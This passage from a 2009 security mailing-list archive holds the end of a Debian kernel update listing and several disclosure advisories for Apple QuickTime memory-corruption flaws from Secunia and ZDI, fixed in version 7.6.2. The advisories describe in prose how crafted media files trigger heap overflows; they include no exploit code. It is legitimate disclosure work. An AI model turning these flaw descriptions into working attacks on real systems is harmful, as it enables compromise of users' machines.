http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 401550 c6775ca9c4e055702f51f092fe6ef9bc http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.26-1um-2+15lenny3_i386.deb Size/MD5 checksum: 5353010 792bdac239c1ca30a789db725054af5f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 1589358 0b0c34f344db8f7c46415c1afface64e http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 103762 e931b2c77186c423479735e5b6866065 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 20142722 6806da5b7fc3743f98b94ec68f20b8ca http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 398238 896d8974fa1dbff7e75c095a67951c43 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 384466 bd876e1268d821f303c7b714933ef414 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 3771072 bd6f324f37578a2de6d96445db42afa0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 3847958 4d7835fc6b2a9ca2cd73700c430f0c5e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 20082826 f460395d96e439a841df1c88e26b0c5c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 20412854 6e257aa61854f1dc5f30fa8b2f8c571d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-15lenny3_i386.deb Size/MD5 checksum: 395936 00689bf9db8aeb2b56de61388527e493 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 3651414 17582a308a8e48f9bb6fcd31deaa9ab2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 34178072 0a0fb6cb5713feab27858a3c002f349c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 352558 3f6c14cb9e86ea55e0b2b5c3b0d6f2cd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 33920912 3482bb27ff5c3a283c528f519b3f9016 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 34097250 cfc1928dbe7c869c90f869b4a30a86f0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 351844 97032276205187631434f2310cc428eb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 33988852 04c59bd841368a21aeb7b308a8c5dd59 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 745348 3f479273599233d60427f77cb5c727a7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 351868 f7a76d5a6ca9f4184a1c0607edd0afa3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 353648 08112eaddd3ff5c028c14078e8e8a847 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 103810 6e007f953a41a84a9c2781d21cc06351 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 3683648 62156471dd19e10f4f9063560d609c98 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_ia64.deb Size/MD5 checksum: 103778 c79b817fc9aa4ddef80f4ad4b95ce379 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 292150 14f079bab0462128f882134fb57f8fca http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 23216992 cb2dbd90614728369e5595d6a9e8f3f7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 103828 1fc2a44c9f7637e2a871208fa0321082 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 11388614 a61846b3a4f10c533502124d1f4f134f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 292278 25a76f593b03bddf7b1cccb956b9b854 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 248692 271b7e937e291c31ae68c22c631f5ccb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 274822 099aa5e926c7da34fc202278ac772084 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 739344 35b5574d7b1ee97fd64c68c3a01a9b2e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 346700 efa670fe5aa9483121f0d00f16fb507f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 15624774 a6a1f86a1e073b1b7188992ec0236d2e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 29080782 324f28a76e0a22e04c2efed75b264caa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 103774 8f2feaedccbdb119a0ffafd3d334d64c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 19941256 d32ce1ea91d75cbfd5af204694b0a7ea http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 19952292 aea356906e433781b1d79cd3d7ab1235 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 345828 d24d29556a254b31af656918d067e113 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_mips.deb Size/MD5 checksum: 3887506 e38994c53c3275e177a65f28165ab658 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 28243802 c51cd8ffeafbdae90468708afe1a3e11 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 292468 3258486fa5cc15544ca3c96c5478ce04 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 103774 11f555f99522ab1776d8828f4fc6522d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 103826 ac7eb25793f023203e38a697069e6289 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 19385680 8d0f0648d5db3b9b211ff4e179239291 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 346356 0558fc92a93c1873cabfbba928f63c1b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 739334 84c09b9d96ffc59760d1c034b621d4cb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 14885266 1b43f420c589d694398c1a5fb5a16c61 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 345640 da3c6f2112b36868a519a18df524faaf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 291668 eb4295e01bcfb37623b5abae2f68bbe1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 288134 a021d1cb130a7299ae1ffc9a2e9e67d6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 19378850 f3db9ff3077550463e1cd213a0880e15 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 3887618 bee75eb41699ba45d1e977bc9f3748e6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-15lenny3_mipsel.deb Size/MD5 checksum: 22773790 4f6c6529f2a168c662d913a6ed1740b8 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 23112264 07440a266e7be4a5b27f6346525ba4d6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 23341276 6401e75149d1d95802c2d4ba6a9330fe http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 3887024 5e49110e1d844d6a28991763fd06f70e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 362918 bede9d123cb06d89ddb5b9ab4344e54c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 370516 33dfbc64dffc8f7f6890368d6c030e4c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 3852208 ef479d3bc3f185be776eda8ceb9e38e3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 23549114 0062ed66c70051935f00f834b023cea1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 364510 39e0d0591befdfb13e23acc2f65106c4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 103776 bcb45b6122bb7c7a8b4b85b768371d5c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 371018 0693110ef3dc607c63da613557248704 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 752918 ec6bde579ae81a8ac1a1f6c9627dd229 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 23515428 8b65b8855083ffaefc5113aaee107025 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 103810 20a6634afe8f5f27f0fe1f093a3369aa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 364612 7602ffb3d08026e249ca66a8df0a224e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-15lenny3_powerpc.deb Size/MD5 checksum: 23390388 f551d4bd4c9eccf40b0b0b234cac83d3 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 103772 571ee662ce57ade54dbd1a664ae75f68 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 3559496 078cb9c8f1208bf21ea6b7b9645666a6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 7481622 0f6fa8a5a1a21e8fcf81920ae40fd294 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 228336 c0599668db945d86027eb14173511dff http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 103792 6aa03add4cc4aa05dbef52e9f436bfc4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 7768658 82d0ed8506685e1887317c89326c6e0b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 226226 1b91dded115bc6e51f87b397984601f0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 3527028 9396a629d2899d74fbe5184d102a917b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 226984 21748fad951db018cdba74a16d881d6a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 7829518 65d79ed3ca8cc3661b2ecb173826326f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 738618 79f44b5e59ce5c10b644afec6d4a684f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-15lenny3_s390.deb Size/MD5 checksum: 1625838 3df32ffbf10bfe88bcc04a6587814d16 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 3810412 bdf2c6cd87ab765f0f285461a49458a2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 103684 43f783e16da77d6a8c2e344fd461e6e9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 14476300 6a28443189e95b67f80dcb97e5c97c36 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 14131192 218f372bc7fef270ddf8f6ad29163efd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 296056 95e911666ecf0d808d6b59956d922245 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 3774692 f7ab2df2eec5e31c5b26e033dbe5e367 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 297648 7c54056381be3e4f2ed0cb5ba88144d8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 103710 294a0b3a76e927bcd6a952835196d4c4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 297476 1dc9d86635a90d104ab9fc336dfaf4b6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 795518 3a192797ecc961db568f07d7f9f34b6f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-15lenny3_sparc.deb Size/MD5 checksum: 14456778 08e3c0139a0fef8f8b0b161ff33ffce4 These changes will probably be included in the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKJLBchuANDBmkLRkRAiUxAJwIPyVWljEFeif/1C7kCOj2VCZRLwCfbGrO RQepXBG+KTDIi6wK7mxMmog= =gQDQ -----END PGP SIGNATURE----- From roeehay at gmail.com Tue Jun 2 08:43:21 2009 From: roeehay at gmail.com (Roee Hay) Date: Tue, 2 Jun 2009 10:43:21 +0300 Subject: [Full-disclosure] Apple QuickTime Image Description Atom Sign Extension Memory Corruption (CVE-2009-0955) Message-ID: <32cf00140906020043n1071e1a5u60901f8e71851455@mail.gmail.com> Hi, Apple has released a new version of QuickTime (7.6.2) which addresses a vulnerability I reported to them back in March. The full advisory can be found at http://roeehay.blogspot.com/2009/06/apple-quicktime-image-description-atom.html -Roee Hay -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090602/58d9ed2e/attachment.html From remove-vuln at secunia.com Tue Jun 2 09:11:28 2009 From: remove-vuln at secunia.com (Secunia Research) Date: Tue, 2 Jun 2009 10:11:28 +0200 Subject: [Full-disclosure] Secunia Research: Apple QuickTime MS ADPCM Encoding Buffer Overflow Message-ID: <200906020811.n528BS7r007597@ca.secunia.com> ====================================================================== Secunia Research 02/06/2009 - Apple QuickTime MS ADPCM Encoding Buffer Overflow - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * Apple QuickTime version 7.6 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System access Where: Remote ====================================================================== 3) Vendor's Description of Software "Whether you are creating content for delivery on cell phones, broadcast or the Internet, or a software developer looking to take your application to the next level, QuickTime provides the most comprehensive platform in the industry." Product Link: http://www.apple.com/quicktime/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Apple QuickTime, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by an error in the processing of MS ADPCM encoded audio data. This can be exploited to cause a heap-based buffer overflow via a specially crafted AVI file. Successful exploitation may allow execution of arbitrary code. ====================================================================== 5) Solution Update to version 7.6.2. ====================================================================== 6) Time Table 04/02/2009 - Vendor notified. 05/02/2009 - Vendor response. 25/05/2009 - Status update requested. 26/05/2009 - Vendor provides status update. 02/06/2009 - Public disclosure. ====================================================================== 7) Credits Discovered by Alin Rad Pop, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0185 for the vulnerability. Apple: http://support.apple.com/kb/HT3591 ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-6/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From remove-vuln at secunia.com Tue Jun 2 09:15:34 2009 From: remove-vuln at secunia.com (Secunia Research) Date: Tue, 2 Jun 2009 10:15:34 +0200 Subject: [Full-disclosure] Secunia Research: QuickTime Sorenson Video 3 Content Parsing Vulnerability Message-ID: <200906020815.n528FYtY007817@ca.secunia.com> ====================================================================== Secunia Research 02/06/2009 - QuickTime Sorenson Video 3 Content Parsing Vulnerability - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * Apple QuickTime 7.60 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Vendor's Description of Software "When you hop aboard QuickTime 7 Player, you?re assured of a truly rich multimedia experience.". Product Link: http://www.apple.com/quicktime/player/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in QuickTime, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by an error in the parsing of Sorenson Video 3 content. This can be exploited to corrupt memory by tricking a user into viewing a specially crafted movie file. Successful exploitation may allow execution of arbitrary code. ====================================================================== 5) Solution Update to version 7.6.2. ====================================================================== 6) Time Table 26/02/2009 - Vendor notified. 02/03/200X - Vendor response. 25/05/2009 - Status update requested. 26/05/2009 - Vendor provides status update. 02/06/2009 - Public disclosure. ====================================================================== 7) Credits Discovered by Carsten Eiram, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0188 for the vulnerability. Apple: http://support.apple.com/kb/HT3591 ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-10/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From zdi-disclosures at tippingpoint.com Tue Jun 2 18:21:37 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Tue, 2 Jun 2009 12:21:37 -0500 Subject: [Full-disclosure] ZDI-09-025: Apple Quicktime Picture Viewer FLC Delta-Encoded Frame Decompression Vulnerability Message-ID: <C64AC9D1.17C7D%zdi-disclosures@tippingpoint.com> ZDI-09-025: Apple Quicktime Picture Viewer FLC Delta-Encoded Frame Decompression Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-025 June 2, 2009 -- CVE ID: CVE-2009-0951 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6570. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of QuickTime Player. User interaction is required to exploit this vulnerability in that the target must either open a malicious file, or visit a malicious web page. The specific flaw exists during decompression of a delta-encoded chunk. The algorithm to decompress the frame trusts a line specifier when calculating where to write decompressed data. This results in a relative write using attacker supplied values which can lead to remove code execution under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3591 -- Disclosure Timeline: 2008-10-28 - Vulnerability reported to vendor 2009-06-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From zdi-disclosures at tippingpoint.com Tue Jun 2 18:23:49 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Tue, 2 Jun 2009 12:23:49 -0500 Subject: [Full-disclosure] ZDI-09-026: Apple QuickTime Packed-bit Decoding Heap Overflow Vulnerability Message-ID: <C64ACA55.17C83%zdi-disclosures@tippingpoint.com> ZDI-09-026: Apple QuickTime Packed-bit Decoding Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-026 June 2, 2009 -- CVE ID: CVE-2009-0952 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8047. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists when the application parses a malformed .PSD image. While decoding the columns, rows and channels in the image header, the application trusts a different length for copying than used for allocating it. This results in a heap overflow and can lead to code execution under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT3591 -- Disclosure Timeline: 2009-04-15 - Vulnerability reported to vendor 2009-06-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From zdi-disclosures at tippingpoint.com Tue Jun 2 18:25:11 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Tue, 2 Jun 2009 12:25:11 -0500 Subject: [Full-disclosure] ZDI-09-027: Apple Quicktime PICT Opcode 0x8201 Heap Overflow Vulnerability Message-ID: <C64ACAA7.17C89%zdi-disclosures@tippingpoint.com> 